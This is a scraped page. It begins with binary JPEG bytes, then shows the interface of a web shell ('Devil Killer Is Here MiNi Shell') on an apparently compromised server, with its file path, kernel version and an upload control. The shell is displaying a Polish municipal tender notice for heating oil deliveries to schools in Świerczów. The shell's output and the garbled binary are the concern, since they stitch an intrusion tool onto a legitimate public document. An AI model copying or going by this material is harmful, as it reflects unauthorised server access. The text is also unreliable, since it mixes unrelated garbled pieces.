JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20221223/0051443701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Dostawa oleju opałowego do kotłów grzewczych w budynkach GOK, Zespołu Szkolno-Przedszkolnego w Świerczowie oraz Szkoły Podstawowej w Dąbrowie w ilości 77 000 l” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Świerczów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 531412757</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Brzeska</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Świerczów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">46-112</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL523 - Nyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">774008069</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@swierczow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.swierczow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dostawa oleju opałowego do kotłów grzewczych w budynkach GOK, Zespołu Szkolno-Przedszkolnego w Świerczowie oraz Szkoły Podstawowej w Dąbrowie w ilości 77 000 l” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-fd3395df-82ae-11ed-94da-6ae0fe5e7159</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00514437</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002592/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa oleju opałowego do kotłów grzewczych w budynkach GOK, Szkoły i Przedszkola w Świerczowie oraz Szkoły Podstawowej w Dąbrowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W niniejszym postępowaniu o<br/>udzielenie zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się w języku<br/>polskim, przy użyciu mini Portalu https://miniportal.uzp.gov.pl/, ePUAPu<br/>https://www.epuap.gov.pl/wps/portal oraz poczty elektronicznej Zamawiającego – ug_rolnictwo@swierczow.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy:<br/>złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji. Wymagania<br/>techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii<br/>dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w<br/>Regulaminie korzystania z systemu mini Portal oraz Warunkach korzystania zelektronicznej platformy<br/>usług administracji publicznej (ePUAP). Wykonawca przystępując do niniejszego postępowania o<br/>udzielenie zamówienia publicznego, akceptuje warunki korzystania z miniPortalu, określone w<br/>Regulaminie mini Portalu oraz zobowiązuje się korzystając z mini Portalu przestrzegać postanowień<br/>tego regulaminu. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych<br/>formularzy do: złożenia i wycofania oferty oraz do komunikacji wynosi 150 MB. Za datę przekazania<br/>oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji, przekazywanych w postępowaniu, przyjmuje się<br/>datę ich przekazania na ePUAP. W przypadku przekazania dokumentów<br/>oraz informacji za pomocą poczty elektronicznej – datą ich przekazania będzie data ich wpłynięcia na<br/>pocztę elektroniczną Zamawiającego.<br/>Zamawiający w niniejszym postępowaniu o zamówienie podaje ID postępowania. Dane postępowanie<br/>można wyszukać również na Liście wszystkich postępowań w mini Portalu klikając wcześniej opcję<br/>„Dla Wykonawców” lub ze strony głównej z zakładki Postępowania na mini Portalu. Sposób<br/>sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U.<br/>z 2020 poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r.<br/>w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może<br/>żądać zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415). Wymagania techniczne związane z korzystaniem z miniPortalu Zamawiający określił również w pkt. 8.10 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">zgodnie z art.13 ust.1 i ust.2 Rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE, Dziennik Urzędowy UE, L 119/1 z 4 maja 2016 r. (ogólne<br/>rozporządzenie o ochronie danych), informuje, że:<br/>1) Administratorem danych osobowych Wykonawcy jest Zamawiający. Wyznaczony został kontakt do Inspektora Ochrony Danych:<br/>Wyznaczony został kontakt do Inspektora Ochrony Danych: tel. 887818800, e-mail: biuro@centrumcyfryzacji.pl, lub tradycyjną<br/>poczta na adres Zamawiającego.<br/>2) Cele przetwarzania danych osobowych: realizacja niniejszej umowy.<br/>3) Kategorie danych osobowych: imię, nazwisko, dane adresowe, dane identyfikujące osobę, świadectwa i uprawnieninia niezbędne<br/>do wykonywania pracy, inne dane niezbędne do realizacji umowy.<br/>4) Źródłem danych jest Wykonawca.<br/>5) Odbiorcy danych – odbiorcami danych są podmioty wskazane w przepisach prawa. Odbiorcami mogą być: organy kontroli (RIO,<br/>NIK, CBA i inne), Instytucje finansujące, Sądy, Policja. 6) Dane osobowe będą przechowywane przez 5 lat po zakończeniu umowy. Wykonawca posiada następujące prawa w odniesieniu<br/>do danych osobowych:<br/>a) prawo do żądania dostępu do danych osobowych,<br/>b) prawo do sprostowania danych osobowych,<br/>c) prawo żądania ograniczenia przetwarzania danych.<br/>7) Wykonawca posiada prawo do złożenia skargi do organu nadzorczego, którym jest Prezes Urzędu Ochrony Danych Osobowych.<br/>8) Podanie danych osobowych w zakresie realizacji niniejszej umowy jest obligatoryjne.<br/>9) Przekazanie danych do państwa trzeciego – nie dotyczy.<br/>10) Zautomatyzowane podejmowanie decyzji – nie jest stosowane.<br/>11) Dodatkowe informacje na temat wykorzystania i zabezpieczania danych osobowych Wykonawcy, przysługujących uprawnień i<br/>warunków skorzystania z nich znajdują się w siedzibie Zamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RIM.271.08.2022.MH</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest „Dostawa oleju opałowego do kotłów grzewczych w budynkach GOK, Zespołu Szkolno-Przedszkolnego w Świerczowie oraz Szkoły Podstawowej w Dąbrowie w<br/>ilości 77 000 l”.<br/>Szczegółowy opis odbiorców na których należy wystawiać faktury:<br/>• Zespół Szkolno-Przedszkolny w Świerczowie<br/>(Przedszkole)<br/>ul. Szkolna 5, 46-112 Świerczów - dostawa do 9 000 l<br/>NIP: 752-146-27-12<br/>• Zespół Szkolno-Przedszkolny w Świerczowie<br/>(Szkoła)<br/>ul. Brzeska 28, 46-112 Świerczów - dostawa do 28 000 l<br/>NIP: 752-146-27-12<br/>• Szkoła Podstawowa w Dąbrowie<br/>Dąbrowa, ul. Parkowa 4 - dostawa do 17 000 l<br/>46-112 Świerczów<br/>NIP: 752-13-54-939<br/>• Gminny Ośrodek Kultury w Świerczowie<br/>ul. Brzeska 17, 46-112 Świerczów - dostawa do 6 000 l<br/>NIP: 752-142-92-64<br/>• Gmina Świerczów (jednostki podległe)<br/>ul. Brzeska 48, 46-112 Świerczów - dostawa do 17 000 l<br/>NIP: 752-13-59-210<br/>UWAGA !<br/>Dostarczona ilość paliwa fakturowana będzie w litrach rzeczywistych.<br/>Podstawowe parametry oleju opałowego<br/>- wartość opałowa min. 42,6 MJ/kg<br/>- gęstość max. 0,860 kg/l<br/>- temperatura zapłonu powyżej 56° C<br/>- zawartość siarki max. 0,10% </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09135100-5 - Olej opałowy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi<br/>kryteriami i ich znaczeniem:<br/>KRYTERIUM RANGA<br/>- cena ofertowa 60 % (1% = 1 pkt)<br/>- termin dostawy 40% ( 1%= 1 pkt.)<br/>Oferta wypełniająca w najwyższym stopniu wymagania określonego kryterium otrzyma maksymalną<br/>ilość punktów.<br/>Pozostałym wykonawcom spełniającym wymagania przypisana zostanie odpowiednio mniejsza liczba<br/>punktów.<br/>Ocena ofert w zakresie przedstawionego wyżej kryterium zostanie dokonana wg następujących zasad:<br/>C = Cmin / Cn x 60 pkt.<br/>gdzie:<br/>C – ranga oferty,<br/>Cmin – najniższa cena spośród oferty ważnych<br/>Cn – cena oferty badanej<br/>D= Najdłuższy zaproponowany termin dostawy / Zaproponowany termin dostawy badanej oferty x 40<br/>pkt.<br/>D- termin dostawy<br/>Ocena punktowa w ramach kryterium - termin dostawy <br/>- 2 dni max 40 pkt.<br/>- 3 dni 30 pkt.<br/>- 4 dni 20 pkt.<br/>L= C+D<br/>L – całkowita liczba punktów<br/>Zamawiający do oceny punktowej przyjmie wartość brutto oferty.<br/>Zamawiający udzieli zamówienia wykonawcy, którego oferta odpowiada wszystkim wymaganiom<br/>przedstawionym w ustawie oraz SWZ i została oceniona jako najkorzystniejsza w oparciu o podane kryterium wyboru i nie podlega wykluczeniu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający wykluczy z postępowania o udzielenie zamówienia na podstawie art. 109 ust. 1 pkt<br/>4 ustawy Pzp, Wykonawcę w stosunku do którego otwarto likwidację, ogłoszono upadłość,<br/>którego aktywami zarządza likwidator lub sąd, zawarł układ z wierzycielami, którego działalność<br/>gospodarcza jest zawieszona albo znajduje się on w innej tego rodzaju sytuacji wynikającej z<br/>podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej<br/>niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>b) oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej<br/>samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2021 r. poz. 275),<br/>z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek<br/>o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności<br/>do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie<br/>oferty, oferty częściowej lub wniosku o dopuszczenie do udziału<br/>w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej.<br/>c) oświadczenie o aktualności informacji zawartych w oświadczeniu , o którym mowa w art.125 ust.1<br/>ustawy Pzp w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego – załącznik Nr 6 do formularza oferty.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu, na podstawie art. 108 ust. 1 ustawy Pzp i art. 109 ust. 1 pkt 4 ustawy Pzp, z zachowaniem przepisów art. 109 ust. 3, art. 110 oraz art. 111 ustawy Pzp,<br/>2) spełniają warunki udziału w postępowaniu dotyczące:<br/>a) zdolności do występowania w obrocie gospodarczym:<br/>Nie dotyczy.<br/>c) sytuacji ekonomicznej lub finansowej:<br/>Nie dotyczy.<br/>d) zdolności technicznej lub zawodowej:<br/>Nie dotyczy.<br/>3.1. Do oferty Wykonawca dołącza oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków<br/>udziału w postępowaniu w zakresie wskazanym przez Zamawiającego. W/w oświadczenia stanowić<br/>będą załącznik nr 1 i 2 do oferty.<br/>3.2. Oświadczenia, o których mowa w pkt 3.1. SWZ, stanowią dowód potwierdzający brak podstaw<br/>wykluczenia, spełnianie warunków udziału w postępowaniu, odpowiednio na dzień składania ofert,<br/>tymczasowo zastępujące wymagane przez Zamawiającego podmiotowe środki dowodowe.<br/>3.3. Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków<br/>dowodowych, aktualnych na dzień złożenia podmiotowych środków dowodowych.<br/>3.4. Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o udzielenie<br/>zamówienia, Zamawiający może na każdym etapie postępowania wezwać Wykonawców do złożenia<br/>wszystkich lub niektórych podmiotowych środków dowodowych, aktualnych na dzień ich złożenia.<br/>Jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio podmiotowe środki<br/>dowodowe nie są już aktualne, Zamawiający może w każdym czasie wezwać Wykonawcę lub<br/>Wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych, aktualnych na dzień ich złożenia.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oferta musi zawierać:<br/>1) oświadczenie Wykonawcy składane na podstawie art. 125 ust. 1 ustawy z dnia 11 września<br/>2019 r. Prawo zamówień publicznych, dotyczące spełniania warunków udziału w postępowaniu -<br/>wg załącznika nr 1 do formularza oferty;<br/>2) oświadczenie Wykonawcy składane na podstawie art. 125 ust. 1 ustawy z dnia 11 września<br/>2019 r. Prawo zamówień publicznych, dotyczące przesłanek wykluczenia z postępowania – wg<br/>załącznika nr 2 do formularza oferty;<br/>3) oświadczenie Wykonawców o przynależności lub braku przynależności do tej samej grupy<br/>kapitałowej* ( wg załącznika Nr 3 do formularza oferty);*<br/>4) oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia*<br/>( wg załącznika Nr 4 do formularza oferty);<br/>5) oświadczenie podmiotu udostępniającego zasoby* (wg załącznika Nr 5 do formularza oferty);<br/>6) oświadczenie o aktualności informacji* (wg załącznika Nr 6 do formularza oferty);<br/>7) pełnomocnictwo w przypadku, gdy Wykonawcę reprezentuje pełnomocnik, posiadające<br/>zakres i podpisane przez osoby reprezentujące wykonawcę; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 2.3.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>2.3.2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z<br/>nich nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp i art. 109 ust. 1 pkt<br/>4 ustawy Pzp, z zachowaniem przepisów art. 109 ust. 3, art. 110 oraz art. 111 ustawy Pzp<br/>natomiast spełnianie warunków udziału w postępowaniu Wykonawcy wykazują zgodnie z pkt<br/>2.1.2 SWZ.<br/>2.3.3 W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenia,<br/>o których mowa w pkt. 3.1. SWZ składa każdy z Wykonawców wspólnie ubiegających się o<br/>zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków<br/>udziału w postępowaniu lub kryteriów selekcji, w zakresie, w jakim każdy z Wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów selekcji.<br/>2.3.4. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców są oni<br/>zobowiązani na wezwanie Zamawiającego złożyć dokumenty i oświadczenia, o których mowa w<br/>pkt 3.5. SWZ, przy czym:<br/>1) dokumenty i oświadczenia, o których mowa w pkt 3.5.1. SWZ składa odpowiednio<br/>Wykonawca, który wykazuje 